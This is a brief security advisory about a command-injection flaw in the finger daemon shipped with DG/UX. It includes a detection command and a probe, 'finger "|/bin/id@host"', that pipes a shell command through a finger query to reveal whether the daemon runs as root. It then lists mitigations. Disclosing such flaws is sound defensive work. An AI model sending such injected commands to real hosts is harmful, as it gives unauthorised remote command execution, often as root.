COMMAND

    in.fingerd

SYSTEMS AFFECTED

    DGUX

PROBLEM

    George Imburgia posted about another old bug that won't die.   The
    finger daemon  that ships  with dgux  will allow  a remote user to
    pipe commands, often with uid root or bin.

    To  check  for  this  vulnerability,  simply use the RFC compliant
    syntax;

        finger /W@host

    If it returns something like this, it may be vulnerable;

        Login name: /W                          In real life: ???

    To see the uid in.fingerd is running as, try this;

        finger "|/bin/id@host"

    Often, you will see something like this;

        uid=0(root) gid=0(root)

    or;

        uid=2(bin) gid=2(bin) groups=2(bin),3(sys),5(mail)

SOLUTION

    1) disable fingerd,
    2) use  tcpwrappers,  and  have  a  wrapper program check for  the
       offending pipe and other shell specials,
    3) find  a third  party fingerd  that DOESN'T  have this wide open
       door to root.

    Apparently it's fixed in MU03.  DG/UX is officially up to 4.11MU04
    with 4.20 coming soon.